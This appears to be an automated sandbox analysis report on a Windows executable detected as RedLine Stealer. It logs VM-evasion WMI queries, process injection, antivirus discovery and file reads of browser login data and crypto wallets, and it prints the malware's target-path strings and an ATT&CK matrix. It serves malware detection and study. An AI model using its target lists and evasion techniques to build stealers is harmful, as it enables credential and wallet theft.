Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5452, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 2410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 73C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 83C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 8570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 9570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 15D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Memory allocated: 4F90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Window / User API: threadDelayed 8127			Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Window / User API: threadDelayed 1644			Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe TID: 5468	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe TID: 7308	Thread sleep time: -35048813740048126s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: tmp180F.tmp.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp180F.tmp.3.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmp180F.tmp.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp180F.tmp.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp180F.tmp.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmp180F.tmp.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp180F.tmp.3.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp180F.tmp.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 8ZVd2S51fr.exe, 00000003.00000002.2329731809.0000000001156000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp180F.tmp.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp180F.tmp.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp180F.tmp.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp180F.tmp.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp180F.tmp.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp180F.tmp.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp180F.tmp.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp180F.tmp.3.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp180F.tmp.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp180F.tmp.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Memory written: C:\Users\user\Desktop\8ZVd2S51fr.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Process created: C:\Users\user\Desktop\8ZVd2S51fr.exe "C:\Users\user\Desktop\8ZVd2S51fr.exe"

Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Users\user\Desktop\8ZVd2S51fr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Users\user\Desktop\8ZVd2S51fr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 8ZVd2S51fr.exe, 00000003.00000002.2329731809.0000000001156000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5260, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $sq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $sq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ZVd2S51fr.exe PID: 5260, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

